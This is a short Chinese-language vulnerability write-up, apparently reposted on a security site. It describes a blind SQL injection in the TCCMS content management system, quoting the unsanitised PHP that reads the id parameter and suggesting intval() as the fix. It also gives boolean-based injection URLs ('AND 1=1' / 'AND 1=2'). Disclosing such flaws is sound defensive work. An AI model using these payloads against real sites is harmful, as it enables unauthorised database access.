TCCMS SQL注入漏洞(盲注)

没穿底裤 2019年12月31日20:58:45评论342 views字数 605阅读2分1秒阅读模式
摘要

/app/controller/area.class.php中未对id进行处理,存在注入
[php]
public function getCitys() {

/app/controller/area.class.php中未对id进行处理,存在注入
[php]
public function getCitys() {

$aeraObj = M("area");

$provinceId = $_GET["id"]; //未进行任何处理
//修复建议$provinceId = intval($_GET["id"]); 强制转换

return $aeraObj->getCitysByProvinceId($provinceId);

}
[/php]

/app/model/areaAction.class.php 下直接进行sql处理
[php]
public function getCitysByProvinceId($provinceId) {

$type = $_GET['type'];

$ary =$this->where("pid = ".$provinceId)->limit(1000)->find(); //$provinceId未处理
[/php]

访问:http://0day5.com/index.php?id=1&ac=area_getCitys正常显示

接着 http://0day5.com/index.php?id=1 AND 1=1&ac=area_getCitys

TCCMS SQL注入漏洞(盲注)
再接着 http://0day5.com/index.php?id=1 AND 1=2&ac=area_getCitys
TCCMS SQL注入漏洞(盲注)
本地测试 可判断出 管理员用户个数为1
TCCMS SQL注入漏洞(盲注)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日20:58:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   TCCMS SQL注入漏洞(盲注)http://cn-sec.com/archives/75399.html

发表评论

匿名网友 填写信息